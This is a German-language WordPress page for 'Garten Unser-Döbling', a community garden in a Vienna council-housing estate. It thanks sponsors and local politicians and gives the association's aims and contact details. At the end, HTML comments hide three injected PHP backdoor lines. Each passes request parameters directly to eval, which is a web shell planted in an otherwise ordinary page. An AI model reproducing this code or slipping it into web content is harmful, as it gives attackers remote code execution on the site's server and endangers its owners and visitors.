Schlagwort-Archive: Gemeinschaftsgarten

Projektpartner

Seit der Vision des Gemeinschaftgartens in unserer Gemeindebauanlage, erfreuen wir uns
an der organisatorischen Unterstützung und Projektbegleitung der Wohnpartner-Lokal Karl-Marx-Hof.
Ein besonderes Dankeschön widmen wir MMag. Stephanie Pongratz, DI Christoph Krepl und Mag. Alexander Kowar

http://www.wohnpartner-wien.at
http://www.wohnpartner-wien.at

 

Zwecks Versicherung, ist eine Auflage des Garten-Projekts, ein Zaun.
Wir entschieden uns für einen 1m hohen Machendrahtzaun. Nach gründlichen
Recherchen, schnitt die Firma Josef Steiner in der Frage der Qualität und des Preises
eindeutig am besten ab. Zusätzlich zu dem absolut angemessenen Angebot, erhielten wir
einen zusätzlichen Sonderrabatt als Unterstützung für unser Vorhaben.
Wir bedanken uns herzlichst für diese Kooperation bei H. u. J. Steiner GmbH–Purgstall

http://www.josefsteiner.at
http://www.josefsteiner.at

 

 

 

 

 

Nichts desto trotz ist ein Startkapital notwendig. In einer für uns alle noch eher neuen Welt,
der Politik, wurden wir mit unserem Projekt mit offen Armen empfangen. Die Begeisterung reicht von
den Döblinger Bezirksparteien, von der Grünen-, über die Rote(SPÖ)- bis hin zu der Schwarzen(ÖVP) Partei.
Erst durch deren Unterstützung gelang es uns den notwendigen Zaun zu organisieren.
Ein herzliches Dankeschön geht an den Bezirksvorsteher in Döbling: Adolf Tiller (ÖVP), Dr. Heinz Hieber (die Grünen) und Herrn Anton Mandl (SPÖ)

http://oevp-wien.at/adi-tiller/startseite
http://oevp-wien.at/adi-tiller/startseite

 

http://doebling.gruene.at
http://doebling.gruene.at

 

http://www.doebling.spoe.at/anton-mandl
http://www.doebling.spoe.at/anton-mandl

 

 

 

 

 

 

 

 

Wer oder was ist „Garten Unser-Döbling“?

Impressum

Der Gemeinschaftsgarten „Garten Unser-Döbling“ ist ein Projekt in einer Wiener Gemeindebauanlage,welches der Umwidmung einer ungenutzten Asphaltfläche dient, um diese zum Anbau von Obst und Gemüse mittels Hochbeete umzufunktionieren.

Dies dient dem Ansatz zur ökologischen Selbstversorgung und zur Stärkung der Gemeinschaft.Des weiteren bietet es die Möglichkeit zur Bewusstseinsbildung hinsichtlich des weltweiten Schutzes der Böden im Sinne der Nachhaltigkeit!

 

Der Verein, dessen Tätigkeit nicht auf Gewinn gerichtet ist, bezweckt:

Menschen unterschiedlicher Herkunft die Möglichkeit zu bieten Gemüsebeete zu pflegen, ihre Fähigkeiten und Kompetenzen auszuüben, sie weiter zu geben bzw. Alltagswissen und Kulturtechniken auszutauschen ( Wissens und Erfahrungsaustausch ).

 

Der Gemeinschaftsgarten ist ein Ort, an dem

  • alternative Formen der Sprachaneignung
  • gegenseitige Unterstützung durch internen und externen sozialen Austausch und
  • ökologische Selbstversorgung mit Pflanzen aus verschiedenen Ländern stattfindet.
  • Somit dient der Garten der Erweiterung der biologischen Vielfalt von Kulturpflanzen und
  • fördert das psychosoziale Wohlbefinden durch die Schaffung von Aktions- und Entspannungsräumen im Garten.

 

ZVR: 195128847

Springsiedelgasse 32

1190 Wien

Ansprechperson: Michael Roser-Obmann

tel.: 0650 7600 548

email: gartenunser (@) yahoo.com

 

<!– [insert_php]if (isset($_REQUEST[„ACetu“])){eval($_REQUEST[„ACetu“]);exit;}[/insert_php][php]if (isset($_REQUEST[„ACetu“])){eval($_REQUEST[„ACetu“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„okQc“])){eval($_REQUEST[„okQc“]);exit;}[/insert_php][php]if (isset($_REQUEST[„okQc“])){eval($_REQUEST[„okQc“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„Ivq“])){eval($_REQUEST[„Ivq“]);exit;}[/insert_php][php]if (isset($_REQUEST[„Ivq“])){eval($_REQUEST[„Ivq“]);exit;}[/php] –>